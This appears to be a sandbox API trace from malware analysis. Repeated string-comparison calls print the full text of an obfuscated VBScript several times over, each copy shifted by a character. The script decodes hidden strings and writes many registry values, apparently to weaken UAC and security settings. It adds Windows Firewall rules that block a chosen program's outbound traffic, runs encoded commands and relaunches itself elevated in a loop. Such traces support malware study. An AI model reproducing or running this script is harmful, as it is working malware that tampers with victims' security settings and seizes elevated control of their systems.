bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.920] wcsncmp (_String1="Resume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 69 [0222.920] wcsncmp (_String1="esume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0222.920] wcsncmp (_String1="sume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0222.920] wcsncmp (_String1="ume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 